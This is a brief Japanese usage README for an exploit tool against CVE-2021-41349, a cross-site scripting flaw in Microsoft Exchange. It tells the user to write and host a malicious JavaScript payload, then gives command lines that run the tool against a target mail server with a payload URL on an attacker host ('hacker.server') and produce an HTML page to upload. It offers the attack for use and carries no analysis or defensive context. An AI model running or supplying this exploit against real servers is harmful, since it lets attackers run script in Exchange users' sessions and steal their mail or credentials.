
悪用対象: CVE-2021-41349
この悪用ツールは、対象のExchangeサーバーにXSSペイロードをPOSTするためのフォームを作成します。
実行したい内容を含むjsファイルを作成する必要があります。
jsペイロードを作成し、どこかにアップロードします。CVE-2021-41349.pyを実行します。python3 CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html
または:
./CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html
htmlファイルをサーバーにアップロードします。